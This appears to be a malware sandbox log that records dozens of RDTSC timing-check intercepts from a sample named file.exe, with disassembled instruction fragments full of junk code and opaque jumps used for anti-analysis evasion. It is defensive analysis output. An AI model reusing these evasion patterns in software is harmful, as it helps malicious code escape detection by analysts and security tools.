Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 91098D second address: 910993 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 910993 second address: 910997 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 910997 second address: 9109AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FE83906A391h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9109AE second address: 9109B7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 push edi 0x00000006 pop edi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9109B7 second address: 9109C6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007FE83906A386h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d push ecx 0x0000000e pop ecx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 910B11 second address: 910B2E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE839054489h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 910B2E second address: 910B34 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 910B34 second address: 910B3E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007FE839054476h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 910B3E second address: 910B61 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE83906A395h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d jnl 00007FE83906A386h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 910CAE second address: 910CB5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edi 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 910CB5 second address: 910CC1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jc 00007FE83906A386h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 910CC1 second address: 910CD9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE839054484h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 91438C second address: 9143CE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 mov eax, dword ptr [esp+04h] 0x0000000a push esi 0x0000000b push eax 0x0000000c push esi 0x0000000d pop esi 0x0000000e pop eax 0x0000000f pop esi 0x00000010 mov eax, dword ptr [eax] 0x00000012 pushad 0x00000013 jp 00007FE83906A392h 0x00000019 pushad 0x0000001a pushad 0x0000001b popad 0x0000001c jno 00007FE83906A386h 0x00000022 popad 0x00000023 popad 0x00000024 mov dword ptr [esp+04h], eax 0x00000028 push eax 0x00000029 push edx 0x0000002a jbe 00007FE83906A38Ch 0x00000030 js 00007FE83906A386h 0x00000036 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9143CE second address: 9143D3 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9143D3 second address: 7A19FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pop edx 0x00000006 pop eax 0x00000007 pop eax 0x00000008 mov dword ptr [ebp+122D2544h], esi 0x0000000e je 00007FE83906A38Ch 0x00000014 mov esi, dword ptr [ebp+122D2AAFh] 0x0000001a push dword ptr [ebp+122D0D8Dh] 0x00000020 mov dword ptr [ebp+122D2344h], eax 0x00000026 call dword ptr [ebp+122D1F76h] 0x0000002c pushad 0x0000002d mov dword ptr [ebp+122D2373h], esi 0x00000033 xor eax, eax 0x00000035 cmc 0x00000036 mov edx, dword ptr [esp+28h] 0x0000003a js 00007FE83906A38Ch 0x00000040 xor dword ptr [ebp+122D2594h], eax 0x00000046 add dword ptr [ebp+122D2594h], ecx 0x0000004c mov dword ptr [ebp+122D2CC7h], eax 0x00000052 jmp 00007FE83906A38Fh 0x00000057 add dword ptr [ebp+122D2594h], eax 0x0000005d mov esi, 0000003Ch 0x00000062 mov dword ptr [ebp+122D354Ah], ecx 0x00000068 pushad 0x00000069 add bh, 00000056h 0x0000006c jmp 00007FE83906A392h 0x00000071 popad 0x00000072 add esi, dword ptr [esp+24h] 0x00000076 mov dword ptr [ebp+122D354Ah], esi 0x0000007c lodsw 0x0000007e jmp 00007FE83906A396h 0x00000083 add eax, dword ptr [esp+24h] 0x00000087 stc 0x00000088 jmp 00007FE83906A38Ch 0x0000008d mov ebx, dword ptr [esp+24h] 0x00000091 sub dword ptr [ebp+122D2373h], edi 0x00000097 nop 0x00000098 jl 00007FE83906A394h 0x0000009e push eax 0x0000009f push eax 0x000000a0 push edx 0x000000a1 jmp 00007FE83906A391h 0x000000a6 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 914464 second address: 914468 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 914468 second address: 9144F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jg 00007FE83906A38Ch 0x0000000c popad 0x0000000d add dword ptr [esp], 5B68C300h 0x00000014 xor ch, 0000004Eh 0x00000017 push 00000003h 0x00000019 mov dword ptr [ebp+122D2544h], edi 0x0000001f push 00000000h 0x00000021 jmp 00007FE83906A38Bh 0x00000026 push 00000003h 0x00000028 pushad 0x00000029 mov dx, ax 0x0000002c mov esi, 745B9ED4h 0x00000031 popad 0x00000032 push B7A096EEh 0x00000037 push esi 0x00000038 jo 00007FE83906A388h 0x0000003e pushad 0x0000003f popad 0x00000040 pop esi 0x00000041 xor dword ptr [esp], 77A096EEh 0x00000048 lea ebx, dword ptr [ebp+124462C0h] 0x0000004e push 00000000h 0x00000050 push ebp 0x00000051 call 00007FE83906A388h 0x00000056 pop ebp 0x00000057 mov dword ptr [esp+04h], ebp 0x0000005b add dword ptr [esp+04h], 0000001Dh 0x00000063 inc ebp 0x00000064 push ebp 0x00000065 ret 0x00000066 pop ebp 0x00000067 ret 0x00000068 mov dx, bx 0x0000006b xchg eax, ebx 0x0000006c js 00007FE83906A392h 0x00000072 jc 00007FE83906A38Ch 0x00000078 push eax 0x00000079 push edx 0x0000007a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 914578 second address: 91457C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 91457C second address: 914609 instructions: 0x00000000 rdtsc 0x00000002 js 00007FE83906A386h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007FE83906A393h 0x0000000f popad 0x00000010 add dword ptr [esp], 405EAED8h 0x00000017 mov dword ptr [ebp+122D232Ch], ebx 0x0000001d push 00000003h 0x0000001f mov dh, 03h 0x00000021 push 00000000h 0x00000023 sub dword ptr [ebp+122D1C0Eh], edx 0x00000029 push 00000003h 0x0000002b jmp 00007FE83906A38Ah 0x00000030 push 92D4FCA1h 0x00000035 jmp 00007FE83906A399h 0x0000003a xor dword ptr [esp], 52D4FCA1h 0x00000041 movsx edx, cx 0x00000044 lea ebx, dword ptr [ebp+124462C9h] 0x0000004a jmp 00007FE83906A395h 0x0000004f xchg eax, ebx 0x00000050 push eax 0x00000051 push edx 0x00000052 push edi 0x00000053 push ecx 0x00000054 pop ecx 0x00000055 pop edi 0x00000056 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 914609 second address: 91460F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 91460F second address: 914624 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a jnc 00007FE83906A388h 0x00000010 push edi 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 91469C second address: 9146E2 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pushad 0x00000004 popad 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b push 00000000h 0x0000000d push edx 0x0000000e call 00007FE839054478h 0x00000013 pop edx 0x00000014 mov dword ptr [esp+04h], edx 0x00000018 add dword ptr [esp+04h], 00000018h 0x00000020 inc edx 0x00000021 push edx 0x00000022 ret 0x00000023 pop edx 0x00000024 ret 0x00000025 movsx esi, cx 0x00000028 push 00000000h 0x0000002a mov edi, dword ptr [ebp+122D29C7h] 0x00000030 xor dx, 8BB3h 0x00000035 push FC622B28h 0x0000003a push edx 0x0000003b pushad 0x0000003c push esi 0x0000003d pop esi 0x0000003e push eax 0x0000003f push edx 0x00000040 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9146E2 second address: 914747 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 add dword ptr [esp], 039DD558h 0x0000000d and esi, dword ptr [ebp+122D1F2Fh] 0x00000013 push 00000003h 0x00000015 pushad 0x00000016 mov dword ptr [ebp+122D2311h], ebx 0x0000001c mov dword ptr [ebp+122D1CECh], esi 0x00000022 popad 0x00000023 push 00000000h 0x00000025 push 00000000h 0x00000027 push ebp 0x00000028 call 00007FE83906A388h 0x0000002d pop ebp 0x0000002e mov dword ptr [esp+04h], ebp 0x00000032 add dword ptr [esp+04h], 00000018h 0x0000003a inc ebp 0x0000003b push ebp 0x0000003c ret 0x0000003d pop ebp 0x0000003e ret 0x0000003f mov dword ptr [ebp+122D3337h], esi 0x00000045 push 00000003h 0x00000047 jns 00007FE83906A38Ah 0x0000004d call 00007FE83906A389h 0x00000052 push edx 0x00000053 push eax 0x00000054 push edx 0x00000055 push eax 0x00000056 push edx 0x00000057 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 914747 second address: 91474B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 91474B second address: 91474F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 91474F second address: 914765 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FE83905447Ch 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 914765 second address: 91476C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 91476C second address: 914797 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov eax, dword ptr [esp+04h] 0x0000000b push eax 0x0000000c push edx 0x0000000d jnp 00007FE83905448Eh 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 914797 second address: 9147DC instructions: 0x00000000 rdtsc 0x00000002 jne 00007FE83906A395h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov eax, dword ptr [eax] 0x0000000c jmp 00007FE83906A392h 0x00000011 mov dword ptr [esp+04h], eax 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 push ecx 0x00000019 pop ecx 0x0000001a jmp 00007FE83906A38Eh 0x0000001f popad 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9147DC second address: 914831 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FE839054478h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop eax 0x0000000b push 00000000h 0x0000000d push ecx 0x0000000e call 00007FE839054478h 0x00000013 pop ecx 0x00000014 mov dword ptr [esp+04h], ecx 0x00000018 add dword ptr [esp+04h], 0000001Ch 0x00000020 inc ecx 0x00000021 push ecx 0x00000022 ret 0x00000023 pop ecx 0x00000024 ret 0x00000025 mov dx, 9E87h 0x00000029 jnl 00007FE83905447Ch 0x0000002f lea ebx, dword ptr [ebp+124462D4h] 0x00000035 or dword ptr [ebp+122D1DBCh], eax 0x0000003b push eax 0x0000003c push eax 0x0000003d push edx 0x0000003e pushad 0x0000003f pushad 0x00000040 popad 0x00000041 push eax 0x00000042 push edx 0x00000043 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 914831 second address: 914836 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 926719 second address: 926722 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 933558 second address: 933579 instructions: 0x00000000 rdtsc 0x00000002 jne 00007FE83906A394h 0x00000008 jmp 00007FE83906A38Ch 0x0000000d pushad 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 pushad 0x00000012 jc 00007FE83906A38Ch 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 933579 second address: 933587 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 pushad 0x00000007 popad 0x00000008 jbe 00007FE839054476h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9336FE second address: 933702 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 933702 second address: 933725 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 pushad 0x00000008 jg 00007FE83905447Ah 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007FE83905447Fh 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 933725 second address: 933729 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9339E6 second address: 9339F0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jp 00007FE839054476h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 933D22 second address: 933D2C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007FE83906A386h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 933D2C second address: 933D6C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE83905447Bh 0x00000007 jmp 00007FE839054486h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f jmp 00007FE839054487h 0x00000014 pushad 0x00000015 popad 0x00000016 pop eax 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9342E8 second address: 93431B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop edx 0x00000005 jc 00007FE83906A386h 0x0000000b jno 00007FE83906A386h 0x00000011 jmp 00007FE83906A392h 0x00000016 popad 0x00000017 push ecx 0x00000018 pushad 0x00000019 popad 0x0000001a pop ecx 0x0000001b pop edx 0x0000001c pop eax 0x0000001d ja 00007FE83906A396h 0x00000023 pushad 0x00000024 push eax 0x00000025 push edx 0x00000026 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 93431B second address: 934323 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 93447F second address: 9344A8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FE83906A398h 0x00000009 pop edi 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FE83906A38Ah 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 934608 second address: 934612 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FE839054476h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 92BF7F second address: 92BF99 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE83906A390h 0x00000007 je 00007FE83906A392h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 934D53 second address: 934D59 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 934D59 second address: 934D5E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 934EB2 second address: 934ED5 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 jl 00007FE8390544A4h 0x0000000d push eax 0x0000000e push edx 0x0000000f jne 00007FE839054476h 0x00000015 jmp 00007FE83905447Eh 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 93506E second address: 93507A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007FE83906A386h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9354D9 second address: 9354E7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push edi 0x0000000b pop edi 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9354E7 second address: 9354EB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9354EB second address: 9354FE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FE83905447Ah 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 939BB3 second address: 939BBF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007FE83906A386h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 939BBF second address: 939BC7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 939BC7 second address: 939BFA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FE83906A392h 0x00000009 jmp 00007FE83906A38Ch 0x0000000e jmp 00007FE83906A390h 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 939BFA second address: 939C02 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 939C02 second address: 939C06 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 939C06 second address: 939C35 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FE839054489h 0x0000000d jmp 00007FE83905447Eh 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 939C35 second address: 939C5E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE83906A398h 0x00000007 push esi 0x00000008 pop esi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop edx 0x0000000c pop eax 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 je 00007FE83906A386h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 939C5E second address: 939C79 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ecx 0x00000009 jmp 00007FE83905447Dh 0x0000000e pop ecx 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 939C79 second address: 939C7D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 93BE3B second address: 93BE40 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 93D709 second address: 93D718 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 pop edi 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 93D718 second address: 93D76E instructions: 0x00000000 rdtsc 0x00000002 jne 00007FE839054478h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov eax, dword ptr [esp+04h] 0x0000000e push edx 0x0000000f push esi 0x00000010 jmp 00007FE839054484h 0x00000015 pop esi 0x00000016 pop edx 0x00000017 mov eax, dword ptr [eax] 0x00000019 pushad 0x0000001a jmp 00007FE83905447Bh 0x0000001f jmp 00007FE839054486h 0x00000024 popad 0x00000025 mov dword ptr [esp+04h], eax 0x00000029 push edi 0x0000002a push eax 0x0000002b push edx 0x0000002c pushad 0x0000002d popad 0x0000002e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 93D76E second address: 93D772 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 94155D second address: 941561 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 900387 second address: 90038D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 90038D second address: 900391 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 900391 second address: 900397 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 900397 second address: 9003A1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jne 00007FE839054476h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9003A1 second address: 9003A7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 940E94 second address: 940EAA instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 pushad 0x00000008 push esi 0x00000009 push eax 0x0000000a pop eax 0x0000000b pushad 0x0000000c popad 0x0000000d pop esi 0x0000000e jc 00007FE83905447Eh 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 94124D second address: 94125A instructions: 0x00000000 rdtsc 0x00000002 jp 00007FE83906A386h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 94125A second address: 941261 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop ecx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9413AA second address: 9413B0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9413B0 second address: 941400 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push esi 0x00000006 pushad 0x00000007 popad 0x00000008 pop esi 0x00000009 jnp 00007FE83905447Ch 0x0000000f popad 0x00000010 pushad 0x00000011 push ebx 0x00000012 jg 00007FE839054476h 0x00000018 pop ebx 0x00000019 jns 00007FE83905449Eh 0x0000001f push edx 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 943F9D second address: 943FA1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 943FA1 second address: 943FA5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 943FFD second address: 944002 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 94419E second address: 9441A8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jne 00007FE839054476h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9441A8 second address: 9441AC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
